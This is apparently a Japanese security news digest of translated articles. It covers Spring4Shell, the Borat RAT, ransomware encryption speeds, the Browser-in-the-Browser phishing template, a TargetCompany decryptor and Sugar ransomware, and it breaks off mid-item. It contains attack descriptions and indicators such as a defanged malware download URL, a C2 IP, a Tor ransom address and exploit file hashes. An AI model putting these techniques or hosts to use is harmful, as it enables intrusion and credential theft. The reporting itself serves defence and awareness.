     あなたのQRコード スキャナが機能しているのなら、上のGIFはYouTube上の公式のNever Gonna Give You Upに導くだろう。
     この予期せぬ変化は多くの人々を驚かせた。ある人はこれを"weird wizardry(奇妙な魔法)" だの"LEGEND(伝説)"だのと言い、また、多大なトラフィックのためにYouTubeがこのビデオの「レート制限」を開始したと不満を言う者もいた。
     実際に、QR4とソフトウェアエンジニアJeroen Steemanによって作成されたもののようなオンライン ツールが存在しているので、あなた独自のアニメーションQRコードを作成することが可能である。


    中央に豹のいるアニメーションQRコード            

    バーコードを掘り下げる

       バーコードの起源は1950年台に遡る。Drexel University(ドレクセル大学)の二人の大学院生が電子製品情報のカタログ化と検索のためのシステムの特許を取得したことに始まる。
     しかしながら、本来在庫追跡コンセプトとして始まったこのシステムは、2Dバーコードの誕生により複雑性、利用可能なフォーマット、縦横比の点で徐々に進化した。
     一般的にQR(クイック レスポンス)として知られるこれらのマトリックスは、2Dバーコードの一種であり日本の自動車関連企業Denso Wave(デンソーウェーブ)によって発明されたものである。この企業は、依然として'QR Code'という用語の商標と技術特許を保持している。
     書籍の表紙や商品に見られるUPC(【訳注】アメリカ、カナダで使用されている統一商品コード(バーコード講座より))のような一次元バーコードは、SKU(【訳注】ストックキーピングユニット(Stock keeping Unit)の略。在庫管理上の最小の品目数を数える単位を表す。噛み砕いていうと、全く同じ商品としてお客様にお渡しできるものをSKUと言う(物流現場通信より))、商品番号、特定の文字数まで(約85文字)の他のセットのような単純な一行文字列を保持する能力を持ったものである。対して、2Dバーコードは、データ保持能力、様々なタイプのデータ保持能力、その中に組み込まれている様々なエラーチェックと修正メカニズムで遥かに広範な用途がある。


    一次元バーコードの例            

     名前が現しているように、2Dバーコードは複数の次元を持ち、一行(一次元)だけでなく、マトリックス全体に渡ってデータを格納できる。QRコード マトリックスの各部分は、特別な意味と役割があり、コンテンツを保持するセクションはマトリックス全体の一部に過ぎない。
     2Dバーコードのエラーチェックと修正の側面は、QRコードの一部が切り取られたり破損している場合でさえ、そのQRコードは正しくスキャンされ、その内部に格納されているコンテンツを保持している可能性があるという意味において重要である。試してみよう。


    破損しているが機能するQRコード            

     これは一次元バーコードには当て嵌まらない。一次元バーコードは、スキャナが隣り合った直線バーの幅の比率を計算することによって機能する。そこで、一次元バーコードの一部を隠したり破壊したりすると、正しくスキャンすることができない場合がある。
     しかし、まさしくQRコードに組み込まれているエラー修正メカニズムは、バーコード作成者が創造性を発揮することを可能にしている。マトリックスの小さな部分に機能的なコンテンツ(URLやもう一つのデータのような)をパックしたり、それ以外のマトリックスの部分は芸術的な画像を提供できる空白のキャンバスとして機能させることができる。


    正しくスキャンされるアートで装飾されたQRコード            

     これは、上に示したような芸術的バーコードや最初に示した豹のQRコードGIFが、正しくスキャンできる可能性を説明している。つまり、機能データ(URL)を含んでいるQRコードの領域はマトリックス全体のごく一部である。
     上の豹のQRコードGIFの場合、豹が動いている周囲のピクセル(QRコードの領域)は、相対的に静的である。これは、(アニメーションが再生されている中央ではなく)コンテンツが存在している可能性のある場所である。
     しかし、Freedmanによって共有されたGIFで発生していることは多少複雑に見える。GIFの各フレームは、ピクセルを再配置することでQRコードをほぼ完全に変更している。
     画像認識に精通した人のために、Twitterユーザであり技術ブロガーであるBenBEが、あなたに代わって答えを持っているかもしれない。

    BenBEのTweet

       バズった”Never Gonna Give You Up” QRコード中の全ての小さな正方形に関して、スキャナは、その正方形(全体で3✕3、もしくは、9ピクセルで構成される)の中央だけを確認する。即ち、バーコードのコンテンツ部分(YouTubeのURL)はこれらのピクセル中に格納されている。残りのピクセルは空白のキャンバスとして提供されアニメーションに使用されている。
     「ディザリング」とそれが提供する多くの可能性についての詳細を読みたい人々は、2年前のYCombinatorHackerNewsスレッドへの再訪に心が動くかもしれない。


    ピクチャQRコード            

     ここでは、QRPictureジェネレータについて説明する。ソースコードはGitHubで入手できる。
     このジェネレータを使用すると、可能な限り実際の写真のように見え、完全に機能するQRコードを作成し、好みに合わせてアニメーション化することもできる。

    訳者より、アニメーションQRコードについて学問的知見を求めたいのであれば、こちら(「最適化アルゴリズムを用いたアニメーションQRコードの作成」鹿児島大学 工学部 情報工学科、小野 智司、森永 健介、中山 茂、芸術科学会論文誌 Vol. 8, No. 1, pp. 25 – 34)を参照してください。


    Spring4Shell(CVE-2022-22965): 詳細と緩和策
    Kaspersky : SecureList(2022/04/04)
     先週、研究者はSpring(オープンソースJavaフレームワーク)中に緊急の脆弱性 CVE-2022-22965 を発見した。この脆弱性を使用して、攻撃者はリモートWebサーバ上で任意のコードを実行できる。これは、Springフレームワークの人気を考えると、 CVE-2022-22965を緊急の脅威にした。悪名高いLog4Shellの脅威と類似していることから、この脆弱性は Spring4Shellと名付けられた。

    CVE-2022-22965とCVE-2022-22963: 技術的詳細

     CVE-2022-22965 (Spring4Shell, SpringShell)は、HTTPリクエスト中に格納されているデータをアプリケーションによって使用される特定のオブジェクトにバインディングするためのデータバインディング機能を使用するSpring Framework中の脆弱性である。このバグは getCachedIntrospectionResultsメソッド中に存在している。これは、HTTPリクエストを介してクラス名を渡すことで、そのようなオブジェクトに対する不正アクセスを取得するために使用される。これは、特別なオブジェクト クラスが使用されると、データリークやリモートコード実行のリスクを生成する。この脆弱性は、ずっと前に終わった CVE-2010-1622に類似している。そこで、その名前が classLoaderやprotectionDomainに一致しないようにクラス名チェックが修正として追加された。しかしながら、JDKの新しいバージョンでは、例えば、 Java 9 Platform Module System機能を介して、このような脆弱性攻撃が行える代替方法が存在している。
     攻撃者は、Tomcat(【訳注】Webサーバー上で実行されるJavaのプログラムであるJavaサーブレットを動かすときに必要なソフト(A-Starより))ログ出力設定を上書きし、次に、このフレームワークの脆弱性バージョンを稼働しているサーバ上で任意のコマンドを実行するためにJSP Web Shellをアップロードすることができる。

    脆弱な設定は以下で構成されている

    • • JDK version 9+
      • アプリケーションをサーブするためのApache Tomcat
      • Spring Framework versions 5.3.0 to 5.3.17、5.2.0 to 5.2.19、及び、それ以下
      • WARファイル(【訳注】Java EEで開発されたWebアプリケーションを一つのファイルにパッケージする標準形式の一つ(e-Wordより))としてビルドされたアプリケーション

       CVE-2022-22963は、特別なpring.cloud.function.routing-expressionヘッダをHTTPリクエストに追加することによてSpring Expression Language (SpEL)を介してコードの挿入を可能にする Spring Cloud Functionのルート制御機能中の脆弱性である。SpELは、実行時にクエリとオブジェクトグラフ管理をサポートするSpring Framework用に作成された特別な式言語(【訳注】式の文脈の中で代入を行うことができるプログラム言語(Weblioより))である。この脆弱性はまた、リモートコード実行にも使用することができる。

      • Spring Cloud Function 3.1.6, 3.2.2とそれ以前のバージョン

    Spring脆弱性攻撃に対する緩和策

     CVE-2022-22965は、2.6.6で修正された。詳細は the Spring blog for details参照。
     CVE-2022-22963を修正するには、新しい Spring Cloud Functionのバージョンをインストールする必要がある。VMware website for details参照
     脆弱性攻撃を検出するには、 必ずAdvanced Exploit PreventionとNetwork Attack Blocker機能を有効にする。脆弱性攻撃中に使用されるテクニックの一部は、我々が検出した他の脆弱性攻撃中に見ることができる。これがVerdict名が異なる理由である。

    改竄の兆候

    Verdicts
    PDM:Exploit.Win32.Generic
    UMIDS:Intrusion.Generic.Agent.gen
    Intrusion.Generic.CVE-*.*

    脆弱性攻撃のMD5ハッシュ
    7e46801dd171bb5bf1771df1239d760c – shell.jsp (CVE-2022-22965)
    3de4e174c2c8612aebb3adef10027679 – exploit.py (CVE-2022-22965)


    Kaspersky EDR Expertでの脆弱性攻撃プロセスの検出(画像をクリックすると拡大表示されます)


    新しいBoratリモートアクセス マルウェアが大変なことに
    BleepingComputer : News>Security(2022/04/03)
     Boratと名付けられた新たなリモートアクセス トロイがダークネット マーケット(【訳注】暗号マーケットとも呼ばれる。TorやI2Pなどのダークネットを介して運営されるダークウェブ上の商業ウェブサイト。主に合法商品の販売に加えて、ドラッグ、サイバー兵器、武器、偽造通貨、盗難クレジットカード情報、偽造文書、無許可の医薬品、ステロイドなどの違法商品の販売または仲介取引を行うブラックマーケットとして機能する(Wikipediaより))に現れた。Boratは、簡単で使い易いDDoS攻撃の実行、UAC(【訳注】User Account Control、Windowsのセキュリティ機能の一つで、管理者権限を持つユーザーに普段は一般ユーザーと同じ権限しか与えず、管理者権限の必要な処理を実行しようとした際に画面に警告ダイアログを表示して本当に実行してよいか確認する機能(e-Wordより))のバイパス、身代金要求型マルウェアの配備を提供している。
     RATとして、Boratはリモートの脅威のアクターが犠牲者のマウスやキーボードを制御し、ファイル、ネットワークポイントにアクセスし、彼らの存在のあらゆる兆候を隠蔽することを可能にしている。
     このマルウェアは、そのオペレータが彼らのコンパイル オプションを選択することを可能にしているので、高度で注文仕立てされた攻撃に必要で正確に機能する小さなペイロードを作成することを可能にしている。
     Boratは、オンライン上のBoratに焦点を当て、その機能を明らかにする技術研究用のマルウェアを採取したCybleの研究者によって解析された。


    Boratの機能の一部(画像をクリックすると拡大表示されます)

    多くの機能

     Borat RATがサイバー犯罪者の間で販売されているのか、無料で共有されているのかは定かでないが、Cybleは、ビルダー、そのマルウェア モジュール、サーバー証明書を含んだパッケージの形式で提供されていると発言している。


    Boratアーカイブ中のファイル(画像をクリックすると拡大表示されます)

    このトロイの機能は、夫々、専用のモジュールを持っており以下を含んでいる。

    • ・ Keylogging ー 押したキーを監視し記録し、それらをテキストファイルに保存する
      ・ Ransomware ー 犠牲者のマシンに身代金要求型マルウェアを配備し、Broatを介して自動的に脅迫文を生成する
      ・ DDoS ー セキュリティ侵害したマシンのリソースを使用してターゲットのサーバにガーベッジ トラフィックを送信する
      ・ Audio recording ー 利用可能であれば、マイクロフォンを通して音声を記録し、wabファイルに保存する。
      ・ Webcam recording ー 利用可能であれば、Webカメラからビデオをレコーディングする
      ・ Remote desktop ー 非表示でリモートデスクトップを起動し、ファイル操作、インプット デバイスの使用、コードの実行、アプリケーションの起動等を実行する
      ・ Reverse proxy ー (【訳注】リバースプロキシとは、特定のサーバの代理として、そのサーバへの外部からのすべての接続を中継するプロキシサーバ。当該サーバへアクセスしようとするクライアントはすべてリバースプロキシを経由するよう誘導される(e-Wordより))リモートオペレータが身元の漏洩を防御するためにリバースプロキシをセットアップする
      ・ Device info ー 基本的なシステム情報を入手する
      ・ Process hollowing ー 正当なプロセス中にマルウェアコードを挿入して検出を回避する
      ・ Credential stealing ー ChromiumベースのWebブラウザに格納されているアカウント認証を盗む
      ・ Discord token stealing ー 犠牲者からDiscord(【訳注】アメリカ発のボイスチャット サービス)のトークンを盗む
      ・ 他の機能 ー 音声の再生、マウスボタンの交換、デスクトップの非表示、タスクバーの非表示、マウスが動かなくなる、モニターのオフ、空白画面の表示、システムのハングアップによって、犠牲者を混乱させる


    Boratが宣伝している多くの機能(画像をクリックすると拡大表示されます)

     Cybleの分析で指摘されているように、上述の機能によりBoratは本質的にRAT、スパイウェア、身代金要求型マルウェアになるため、デバイス上で様々な悪意ある行動を実行する可能性のある強力な脅威である。
     全体として、RATの開発者は、Sacha Baron Cohenによって具現化されたコメディ映画Boratの主人公に因んで名前を付けていたとしても、このマルウェアは冗談では済まされない。
     Bleeping Computerは、このマルウェアの素性を発見しようとして深く掘り下げ、実行されるペイロードが最近同定されたAsyncRATであったことを発見した。この作成者はAsyncRATに基づいて作業を行った可能性がある。
     一般的に、脅威のアクターは、実行可能ファイルやゲームやアプリケーションのクラックを装ったファイルを介してこれらのツールを拡散させている。トレント(torrent)や胡散臭いサイトのような信頼できないソースから如何なるものもダウンロードしないよう注意しなさい。


    10の悪名高い身代金要求型マルウェアの暗号化スピードテストが実施された
    BleepingComputer : News>Security(2022/03/23)
     研究者たちは、10の身代金要求型マルウェアの変種がファイルを暗号化する速度をテストし、それらの攻撃に対してタイムリーに対応することがどのように実行できるのかを評価する技術的な実験を行った。
     身代金要求型マルウェアは、セキュリティ侵害したマシン上のファイルやディレクトリを列挙し、効果的な暗号化のターゲットを選択し、そのデータを暗号化するマルウェアである。そこで、対応する復号キーなしでは、これらのファイルは利用できなくなる。
     これで、データの所有者はファイルにアクセスできなくなる。そこで身代金要求型マルウェア攻撃は、データの破壊や運用の中断、あるいは、復号キーと引き換えに身代金の支払いを要求する金銭的な恐喝のどちらかを実行する。
     デバイスを如何に早く暗号化するかは重要なことである。検出が早ければ早いほどダメージはより少なく、復元に必要なデータ量は最小となる。

    身代金要求型マルウェアをテストする

     Splunkの研究者達は、400の暗号化テストを実行した。このテストは、10の異なるマルウェアファミリーから、ファミリーあたり10サンプルを採用し、パフォーマンス仕様の異なる4つの異なるホストプロファイルで構成されている。
     「我々は、Windows 10とWindows Server 2019からなる4つの異なる『生贄』プロファイルを作成した。夫々のプロファイルは、顧客の環境からベンチマークされた2つの異なるパフォーマンス仕様が付属している」と、「次に、10の異なる身代金要求型マルウェアファミリーとこれらのファミリー毎にテスト用の10のサンプルを選択した」と、Splunkは彼らのレポートの中で説明している。
     これらのテストの間、研究者達は、様々なツール(Windows logging, Windows Perfmon statistics, Microsoft Sysmon, Zeek, stoQのような)を使用して98,561ファイル(トータル 53GB)に対する暗号化速度を評価した。
     ホストシステムは、実際の企業ネットワーク設定を反映するように変更された。解析者は、全ての暗号化時間を計測し、各変種が暗号化するための中央値を導いた。
     テスト装置上にある10の異なる身代金要求型マルウェア株の全100種のサンプルの中央値は42分52秒であった。
     しかしながら、以下の表に見られるように、身代金要求型マルウェアのサンプルの一部は、明らかにこの中央値から乖離している。


    各株の平均暗号化時間(画像をクリックすると拡大表示されます)

     「勝者」、応答タイムマージンにおいて致死的な株はLockBitであり、平均5分50秒で達成している。最も高速なLockBitの変種は、1分間に25,000ファイル暗号化した。
     LockBitは、アフィリエイト プロモーションのページで、30を超える様々な身代金要求型マルウェア株に対する独自のベンチマークをリリースし、ファイルを暗号化する最速の身代金要求型マルウェアであると長い間自慢してきた。
     かつて多くの変種を生み出したAvaddonは、平均13分余りで達成し、REvilは、約24分でファイルを暗号化し、BlackMatterとDarksideは、45分で暗号化を完了した。
     遅い方では、Contiが54GBのテストデータの暗号化にほぼ1時間を要し、MazeとPYSAはほぼ2時間を要している。

    時間要素

     時間は重要なファクターであるが、身代金要求型マルウェア攻撃における唯一の検出機会ではない。一般的には、偵察期間、横展開、認証の窃取、特権の昇格、データ漏洩、シャドーコピーの無効化などが含まれる。


    身代金要求型マルウェア攻撃における可能な全検出機会(画像をクリックすると拡大表示されます)

     暗号化が終了した後、攻撃がどれくらい長持ちするのかや、管理の容易さを決定するのは暗号化スキーム自体の強度なので、強度はスピードより重要である。
     身代金要求型マルウェアが最終的に配備された時の応答時間の短さは、特定の検出と緩和の機会に焦点を当てることが非現実的であり、最終的には誤りであることを強調している。
     Splunkのレポートに記されているように、この研究は、組織が重大事案の対応から身代金要求型マルウェア感染の防止に焦点をシフトする必要があることを示している。
     セキュリティ侵害の検出に平均3日かかるとする今までの研究を考慮すると、全体の中央値である43分は、ネットワーク防御側が身代金要求型マルウェアの活動を検出するためのチッポケな手段にすぎない。
     殆どの身代金要求型マルウェア グループは、ITチームが人員不足になっている週末に攻撃してくる。殆どの暗号化の企ては、成功裏に完了する。暗号化の時間は防衛側にとって重要な考慮のファクターではない。
     最終的に、最善の防衛は、身代金要求型マルウェアが配備される前の偵察段階で通常ではない活動を検出することである。
     これには、疑わしいネットワーク活動、通常ではないアカウント活動を探し、攻撃の前に一般的に使用されるツール(Cobalt Strike, ADFind, Mimikatz, PsExec, Metasploit, Rclone)の検出を含んでいる。


    新しいフィッシング ツールキットは誰もがインチキのChromeブラウザ ウィンドウの作成を可能にしている
    BleepingComputer : News>Security(2022/03/19)
     レッドチーム(【訳注】 ある組織の効率性を改善するように挑む独立したグループで、対象組織に敵対した役割あるいは視点を持つことを前提とする(Wikipedia))のメンバーやインチキのChromeブラウザ ウィンドウを使用して効果的なシングル サイン オンのフィッシィング ログイン フォームを作成したい野心的なサイバー犯罪者に作成することを可能にするフィッシングキットがリリースされた。
     Webサイトにサインインするとき、Google, Microsoft, Apple, Twitter, あるいはSteamでさえ、認証オプションが表示されることが一般的である。
     例えば、DropBoxのログイン フォームは、以下に示すようにAppleやGoogleアカウントを使用してログインすることが可能になっている。


    DropBoxログイン フォーム(画像をクリックすると拡大表示されます)

     GoogleやAppleのボタンでログインをクリックすると、シングル サイン オン(SSO)ブラウザ ウィンドウが表示され、あなたの認証情報を入力してアカウントでログインするように促される。
     これらのウィンドウは、ログインフォームと、ログインフォームのURLを表示するアドレスバーだけを表示するようになっている。


    Googleの正当なサインイン ウィンドウ(画像をクリックすると拡大表示されます)

     このアドレスバーは、これらのSSOウィンドウで無効にされているが、表示されたURLを使用して正当なgoogle.comドメインが、サイトへのサインインに使用されていることを確認することができる。このURLは更に、フォームの信頼性を追加し、あなたに快くログイン認証を入力させるようにしている。
     驚異のアクターは、過去にもHTML, CSS, JavaScriptを使用してインチキのSSOウィンドウを作成することを企てているが、通常そのウィンドウには少し疑いをもたせるものが存在している。

    ブラウザ攻撃へのブラウザの導入

     これは、新しい"Browser in the Browser Attack"(【訳注】GoogleやMicrosoftのようなサイトの小さなブラウザウィンドウを真似ることでログイン認証を盗む方法(The Registerより))が、フィッシング攻撃に使用することのできるカスタム アドレスURL、タイトルを含むインチキではあるがリアルなChromeポップアップ ウィンドウを作成するために予め作られているテンプレートの使用が役に立つ場所である。
     基本的に、この攻撃は説得力のあるフィッシング攻撃を作成するために、実際のブラウザウィンドウにインチキのブラウザウィンドウを作成する(Browser in the Browser)。
     このBrowser in the Browser攻撃テンプレートは、セキュリティ研究者mr.d0xによって作成された。そして、彼はGitHub上にこのテンプレートをリリースした。これらのテンプレートは、Windows用のGoogle ChromeとMac用があり、ダークモードとライトモードのバリエーションを含んでいる。


    Facebook用のBitB Chromeフィッシングウィンドウの例(画像をクリックすると拡大表示されます)

     mr.d0xは、このテンプレートは大変簡単なので、あらゆるオンライン プラットフォーム用のシングル サインオンのログインフォームを表示するための説得力のあるChromeウィンドウの作成に使用することができるとBleepingComputerに告げている。
     この研究者は、レッドチームのメンバーが、このテンプレートを単純にダウンロードし、それらを希望するURLとWindowsタイトルを含めるように編集し、iframeを使用してログインフォームを表示することができていると発言している。
     また、直接ログインフォーム用のHTMLをこのテンプレートに追加することも可能であるが、mr.d0xは、使用しているCSSとHTMLを適切にこのフォームと提携させる必要があるとBleepingComputerに告げている。
     Evilginxフィッシィングツールキットの作成者であるKuba Gretzkyは、この新しい方法をテストし、Evilginxプラットフォームで完璧に動作する方法を示している。これは、フィッシング攻撃中に二要素認証キーを盗むように改造することができることを意味している。

    この件に関するKuba GretzkyのTweetは、こちら。

     mr.d0xは、これは新しいテクニックではなく、Steam認証を盗むために2020年にインチキのゲームサイトによって使用されたもので、Zscalerによって報告されていると、BleepingComputerに告げている。

    この件に関するTheAppleFreakのTweetは、こちら。

     しかしながら、現在インチキのChromeウィンドウ用の予め作成されたテンプレートは利用可能であり、レッドチームのメンバーは、彼らの顧客や彼らの所有する企業の従業員の防衛力をテストするために説得力のあるフィッシング サインイン フォームを作成するために、このテンプレートを使用することができる。
     この新しいBrowser in the Browserフィッシング攻撃を試したい人々のために、 GitHubからこのテンプレートを入手することができる。


    TargetCompany身代金要求型マルウェアの犠牲者用の無料の復号ツールがリリースされた
    BleepingComputer : News>Security(2022/02/07)
     チェコのサイバーセキュリティ ソフトウェア企業Avastが、TargetCompany身代金要求型マルウェアの犠牲者のファイルを無料で復号する復号ユーティリティをリリースした。
     しかしながら、Avastは、この復号ツールは「特定の環境の下」で暗号化されたファイルを復元するためにのみ使用することができると警告している。
     この復号ツールを使用してファイルを復元したい犠牲者は、このツールがリソースを消費し時間のかかるプロセスになる可能性があることに注意する必要がある。
     「パスワードをクラッキングしている間、利用可能な全てのプロセッサのコアは、殆どの演算能力を復号パスワードを発見するために消費する。このクラッキング プロセスは10時間以上の膨大な時間がかかるかもしれない」と「この復号ツールは、定期的に進捗を保存する。これを中断させ、後でこの復号ツールを再起動させた場合は、以前開始されたクラッキング プロセスを復活させるオプションを提供してくる」とAvastは発言している。
     TargetCompany身代金要求型マルウェア復号ツールは、暗号化されたファイルとオリジナルの暗号化されていないファイルとを比較した後、パスパードをクラックすることによって機能する。
     Avastによると、これはTargetCompany身代金要求型マルウェアによって暗号化されたデバイス毎に一回実行する必要があり、この復号ウィザードは"I know the password for decrypting files"を選択することによって今までにクラックされた暗号化パスワードの入力を可能にする。


    TargetCompany復号ツール(画像をクリックすると拡大表示されます)

     TargetCompany身代金要求型マルウェアの犠牲者は、Avastサーバからこの復号ツール(64-bitもしくは、32-bit)をダウンロードし、この復号ツールのユーザインターフェイス中に表示されている指示を使用してディスクパーティション全体を復号することができる。
     「このウィザードの最後のページで、暗号化されたファイルをバックアップするか否かを決定することができる。これらのバックアップは、復号プロセス中に何らかの不都合が発生した場合に役に立つ可能性がある」と「このオプションはDefaultでONになっている。これは我々も推奨していることである。'Decrypt'をクリックすると、復号プロセスが開始される。復号ツールが作業しているので、終了するまで待ちなさい」と、Avastは追加している。
     AvastのTargetcompany身代金要求型マルウェア復号ツールの使用方法に関する更なる指示は、こちらで見つけることができる。
     Targetcompanyは、比較的新しく発見された身代金要求型マルウェア株であり、2021年06月中旬以来活動している。このマルウェアは、暗号化されたファイルに .mallox, .exploit, .architek, .brg拡張子を追加する。


    TargetCompany身代金要求型マルウェア サブミッション(画像をクリックすると拡大表示されます)

     また、このマルウェアは暗号化したファイルのある全てのフォルダに"HOW TO RECOVER !!.TXT"と名付けた脅迫文を投下する。
     これは、ボリューム シャドウ コピーを削除し、ブート オプションを再構成し、機密情報のデータベース(例えば、MySQL, Oracle, SQL Server)をロックする可能性のあるプロセスをKillした後に発生する。
    Avastは、2021年10月に、Babuk, AtomSilo, LockFile身代金要求型マルウェアに関して、犠牲者が身代金を支払うことなくファイルの復元を可能にする無料の復号ツールをリリースしている。


    注目される新しいSugar身代金要求型マルウェアの低い身代金要求額
    BleepingComputer : News>Security(2022/02/04)
     新たなSugar身代金要求型マルウェア作戦は、企業ネットワークよりはむしろ積極的に個人のコンピュータを低い身代金額で攻撃している。
     Walmart Security Teamによって最初に発見された'Sugar'は、新しいRansomware-as-a-Service (RaaS)であり、2021年11月に始まり、徐々にスピードアップしてきている。
     この身代金要求型マルウェアの名前は、Walmartによって発見されたこの作戦のアフィリエイト サイト 'sugarpanel[.]space'に由来する。
     このニュースに関して、貴方方が読んできた殆どの身代金要求型マルウェアと異なり、Sugarは企業ネットワークをターゲットにしておらず個人のデバイス、おそらくコンシューマ(【訳注】在宅ビジネスを含む、自宅で使用するために製品を購入する顧客(Microsoft用語集より))や中小企業をターゲットにしているようである。
     この身代金要求型マルウェアが、どのように拡散し、あるいは犠牲者に感染しているのか明らかではない。

    Sugar身代金要求型マルウェア

     起動すると、Sugar身代金要求型マルウェアは、そのデバイスのIPアドレスと地理的場所を取得するために whatismyipaddress.com と ip2location.com に接続する。
     次に、http://cdn2546713.cdnmegafiles[.]com/data23072021_1.datから76MBのファイルをダウンロードして続行するが、このファイルがどのように使用されるのかは不明である。
     最後に、この身代金要求型マルウェア作戦のコマンドアンドコントロールサーバに、この攻撃に関連するデータを送受信する場所である179.43.160.195に接続する。この身代金要求型マルウェアは、実行時にコマンドアンドコントロールサーバにコールバックし続ける、おそらく攻撃の状況からRaaSをアップデートするために。


    Sugar身代金要求型マルウェアによって生成されたネットワーク トラフィック(画像をクリックすると拡大表示されます)

     ファイルを暗号化する時、この身代金要求型マルウェアは、以下のフォルダ中にリストされているファイルや以下のファイル名を持つものを除く全てのファイルを暗号化する。

      除外されるフォルダ:

       \windows\
       \DRIVERS\
       \PerfLogs\
       \temp\
       \boot\

      除外されるファイル:

       BOOTNXT
       bootmgr
       pagefile
       .exe
       .dll
       .sys
       .lnk
       .bat
       .cmd
       .ttf
       .manifest
       .ttc
       .cat
       .msi;

     Walmartの研究者は、この身代金要求型マルウェアはSCOP暗号化アルゴリズムを使用してファイルを暗号化していると発言している。この暗号化されたファイルは、そのファイル名に .encoded01 拡張子を持っている。


    Sugarに暗号化されたファイルは .encode01拡張子が付く(画像をクリックすると拡大表示されます)

     この身代金要求型マルウェアは、そのコンピュータ上でスキャンされたファイルの各フォルダにBackFiles_encoded01.txtと名付けた脅迫文もまた作成する。
     この脅迫文は、犠牲者のファイルに発生したことに関する情報、一意のID、身代金の支払い方法に関する情報のあるTorサイトへのリンクを含んでいる。このTorサイトは、chat5sqrnzqewampznybomgn4hf2m53tybkarxk4sfaktwt7oqpkcvyd.onionである。


    Sugarの脅迫文(画像をクリックすると拡大表示されます)

     Torサイトに訪問すると、犠牲者は身代金を送信するためのビットコインのアドレス、チャットセクション、無料で5ファイルを復号するための機能を含む犠牲者独自のページが表示される。


    SugarのTor支払いサイト(画像をクリックすると拡大表示されます)

     この作戦の身代金額は非常に低い。BleepingComputerによって確認された攻撃でのキーを受け取るための要求額は、数百ドルであった。不思議なことに、我々のテストボックスでの結果として得られた要求額は、僅か0.00009921ビットコイン($4.01=462.05円、本日15:22時点の換算)
     BleepingComputerは少数のファイルを持つ仮想マシンでこの身代金要求型マルウェアをテストしたので、この身代金要求型マルウェアは暗号化したファイルの数に基づいて身代金額を生成していることを示している可能性がある。


    Sugar身代金要求型マルウェアのテストで要求された身代金(画像をクリックすると拡大表示されます)

     殆どの身代金要求型マルウェア感染とは異なり、このマルウェア実行ファイルは、暗号化を終了した後でさえ起動する。しかしながら、自動起動設定は作成されていない。そして、新しいドキュメントの暗号化の継続はしないようである。
     この時点で、この身代金要求型マルウェアが無料で復号を可能にする何らかの弱点を持っているか否かは不明である。さらなる情報が利用可能になれば、この記事はアップデートされる。
     更に、この身代金要求型マルウェアに感染した場合は、どのように感染したのかを我々に知らされたい。


    Microsoft: Windowsは確実なアップデートをするには少なくとも8時間を必要とする
    BleepingComputer : News>Security(2022/01/29)
     Windowsアップデートを介してアップデートがリリースされた後、Windowsデバイスが最新のアップデートを取得し、間違いなくインストールするには少なくとも8時間オンライン上に存在していることが必要であると、Microsoftは発言している。
     Windowsを実行しているデバイスに電源が入り、Windowsアップデートに接続されている総時間は'Update Connectivity'としてMicrosfotによって追跡されている。
     この測定値は、システムの接続時間の不足と、システムがアップデートされていない理由を相互に関連付けているので、一部のデバイスが、最近リリースされたアップデートを正常に取得できない理由であることの解りやすい説明となっている。
     David Guyer(MEM(【訳注】Microsoft Endpoint Manager、すべてのエンドポイントを管理するための単一の統合エンドポイント管理プラットフォーム(Microsoftより))のWindows Updatesに関するMicrosoft Program Manager)によると、Windows Deviceが最新のアップデートを取得し、成功裏にインストールするには少なくともオンライン上に8時間を必要とする。
     「我々の調査で最も影響力のあることの一つは、QualityとFeatureのアップデートが正常にインストールできるようになるにはデバイスの電源をONにし、そして、Windows Updateに接続している必要時間であった」と「我々が発見したことは、接続時間が必要時間に満たないデバイスは、正常にアップデートされそうもない。具体的には、データは、デバイスが確実に更新されるためには、最低2時間の継続的な接続とアップデートがリリースされた後、合計6時間の接続を必要としていることを示している」と、更に「これは、正常なダウンロードとバックグラウンド インストレーションを可能にするので、デバイスがアクティブであり、接続されている限り、再起動もしくはレジューム(【訳注】コンピュータの実行状態を保存して停止させ、次に使用するとき即座に停止直前の状態に復帰する機能(e-Wordより))することができる」とGuyerは発言している。
     Guyerはまた、アップデートをダウンロードし適切にインストールするには、デバイスは電源ONのまま一晩中Internetに接続していたほうがいいと発言している。


    更新プログラム用のIntuneコンプライアンス警告(画像をクリックすると拡大表示されます)

     デバイス > モニター に移動して、Featureアップデートの失敗もしくは、Windows Expeditedアップデート失敗レポートの何れかを選択することによってMicrosoft Intuneを介してUpdate Connectivityが十分でないデバイスを追跡することができる。
     Update Connectivity不十分警告は、Reports > Windows updates > Reports > Windows Expedited update report に進みIntune中のSummaryレポートを介して発見することもできる。
     完全にアップデートされず、最小接続要求未満のWindows 10デバイスを検証した時、Microsoftは以下のように理解していた:

      ・ Windows 10のビルドをサービスされないデバイスの凡そ50%は、最小Update Connectivity計測値を満たしていない。
      ・ ビルドがサービスされたWindows 10デバイスの凡そ25%は60日の期限を越えたセキュリティアップデートを持っており、これは、最小Update Connectivityを超えている。

     「アップデートの問題をトラブルシューティングするとき、十分なUpdate Connectivityを持つデバイスを選択することが最善であることが分かった」と「デバイスのUpdate Connectivityが不十分な場合、他の更新の問題の調査は複雑になる。これは、不十分なUpdate Connectivityが、新しい問題を作成することが理由である。この新しい問題は十分な接続が確立されると解消される」と、Guyerは付け加えている
     関連するニュースに於いて、Microsoftは、'Update Stack Package'と呼ばれる、Windows Update改善のためのよりスマートな配信方法のテストを開始した。これは、Windowsの月例もしくはFeatureのアップデートに先立ち、メジャーなOSアップデートを除くアップデート エクスペリエンスを改善するだろう。
     Microsoftはまた、Windows 11の累積アップデートをWindows 10コンピュータより凡そ40%小さくすることで、セキュリティとQualityアップデートをより高速にアップデートすることができるように再設計している。
     昨年、MicrosoftはWindows Updateを管理するための新しいAPIをリリースした。これは、開発者やITプロフェッショナルが、エンタープライズ環境で迅速なWindows10 セキュリティ アップデートを有効にするものである。


    Windows Defenderの弱点はハッカーにマルウェアの検出をバイパスさせることを可能にしている
    BleepingComputer : News>Security(2022/01/13)
     脅威のアクターは、Windows上のMicrosoft Defenderアンチウィルスの欠点(このアンチウィルスがスキャンしていないロケーションがあることを学習)を悪用し、そこにマルウェアを植え付けている。
     一部のユーザによると、この問題は少なくとも8年間続いており、Windows 10 21H1とWindows 10 21H2に影響を与える。

    緩いパーミッシヨン

     他のあらゆるアンチウィルス同様に、Microsoft Defenderは、マルウェアのスキャンから除外されるシステム上の場所(ローカルやネットワーク)を追加することをユーザに許可している。
     人々は一般的に、正当なアプリケーションの機能がマルウェアとして誤検出され、その機能に影響が及ぶことを防ぐために除外設定を実行している。
